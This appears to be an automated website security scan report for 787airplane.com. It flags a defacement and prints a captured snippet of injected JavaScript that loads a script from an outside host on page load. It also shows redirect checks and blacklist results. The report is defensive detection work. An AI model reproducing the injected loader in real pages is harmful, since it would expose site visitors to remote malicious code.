Scanned pages/files
Request | Server response | Status |
http://787airplane.com/ | 200 OK Content-Length: 1895 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: -=[Hacked By DendyDwi 0100111]=- ...[56 bytes skipped]... ion sbxzk(){ var iczms = document.createElement('script'); iczms.src = 'http://blondescript.com/data/jquery_1.7.4.min.js?r='+window.location.hostname; document.getElementsByTagName('head')[0].appendChild(iczms); };var hckvx = setInterval(function(){if(document.body != null && typeof document.body != 'undefined'){clearInterval(hckvx);sbxzk();}},100);@*/ </script><html><title>-=[Hacked By DendyDwi 0100111]=-</title><head></head><body><div <body bgcolor="#000000" background="http://i1050.photobucket.com/albums/s414/BL4CK_3YE116/kilat1-1_zps2ae6671b.gif"> <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'> <body bgcolor="#000000" background="http://i1050.photobucket.com/albums/s414/BL4CK_3YE116/kilat1-1_zps2ae6671b.gif"> align="center"><div id="layer1" styl ...[1348 bytes skipped]... | ||
http://787airplane.com/test404page.js | 404 Not Found Content-Length: 1683 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 787airplane.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 05 Mar 2015 21:20:09 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 6358d7fde2707b2db81f26dab3fdd173=3cc02cc8d535f25c46a444f3b5cc2f78; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: 787airplane.com
Referer: http://www.google.com/search?q=787airplane.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=787airplane.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://787airplane.com/
Result: 787airplane.com is not infected or malware details are not published yet.